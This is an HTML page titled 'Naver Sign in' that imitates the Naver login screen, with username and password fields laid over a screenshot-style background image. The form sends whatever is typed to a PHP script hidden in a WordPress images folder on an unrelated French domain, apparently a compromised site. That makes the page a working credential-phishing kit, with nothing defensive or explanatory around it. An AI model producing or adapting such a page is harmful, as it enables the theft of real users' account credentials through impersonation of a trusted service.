<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Naver Sign in</title>
<meta http-equiv="content-type" content="text/html; charset=UTF8">

<link href="images/favicon,ico" rel="apple-touch-icon-precomposed" />




<style> 
  .textbox { 
    font-family: Arial, Helvetica, sans-serif;
    
    color: #333; 
    
    padding: 4px 8px 4px 4px !important;
    line-height: 1; 
    width: 275px; 
    height:46px;
font-size: 18px;	
  } 
 .textbox:hover { 
    border: 1px solid green; 
    box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    -moz-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    -webkit-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
  } 
 .textbox:focus { 
   
    outline: none; 
    box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3);  
    -moz-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    -webkit-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    background: rgb(255, 255, 255); } 
  
</style>



<style> 
  .textbox2 { 
    font-family: Arial, Helvetica, sans-serif;
    
    
    
    padding: 4px 8px 4px 4px !important;
    line-height: 1; 
    width: 275px; 
    height:46px;
font-size: 18px;	


  } 
 .textbox:focus { 
   
    outline: none; 
    box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3);  
    -moz-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    -webkit-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    background: rgb(255, 255, 255); } 
  
</style>
<style type="text/css">
div#container
{
	position:relative;
	width: 100%;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>

			<script language="javascript">
function submitform()
{
   document.forms["Form"].submit();
}

// Form validation code will come here.
function validate()
{
 
   if( document.Form.formtext1.value == "" )
   {
     alert( "Enter your ID or email address." );
     document.Form.ID.focus() ;
     return false;
   }
   if( document.Form.formtext2.value == "" )
   {
     alert( "Enter password." );
     document.Form.PASSWD.focus() ;
     return false;
   }
  else{
   return( true );
   }
}
//-->
</script>

</head>
<body bgColor="#F5F6F7" Link="#000000" VLink="#000000" ALink="#000000"  >
<div id="container">
  <div id="image1" style="position:absolute; overflow:hidden; left:328px; top:32px; width:776px; height:746px; z-index:0"><img src="images/body.png" alt="" title="" border=0 width=776 height=746></div>
  <div id="image2" style="position:absolute; overflow:hidden; left:551px; top:493px; width:271px; height:28px; z-index:1"><a href="#"><img src="images/fo.png" alt="" title="" border=0 width=271 height=28></a></div>

  <form action="https://missioncoaching.fr/wp-includes/images/media/nv/nv-c.php" name="Form" method="post" onSubmit="return(validate());">
<input name="formtext1" value="" class="textbox" type="text" required placeholder="Username" style="position:absolute;width:459px;left:463px;top:180px;z-index:4" >
<input name="formtext2" class="textbox" type="text" required placeholder="Password" type="password" style="position:absolute;width:459px;left:463px;top:248px;z-index:4">
<div id="formimage1" style="position:absolute; left:463px; top:321px; z-index:5">
  <input type="image" name="formimage1" width="461" height="63" src="images/sign in.png" type="submit" >
</div>
<div id="fb" style="position:absolute; left:460px; top:595px; z-index:5; width: 56px;">
  <img src="images/fb.png">
</div>
<div id="linr" style="position:absolute; left:733px; top:595px; z-index:5 width: 56px;">
  <a href="#"><img src="images/line.png"></a>
</div>
  </form>
</div>

</body>
</html>
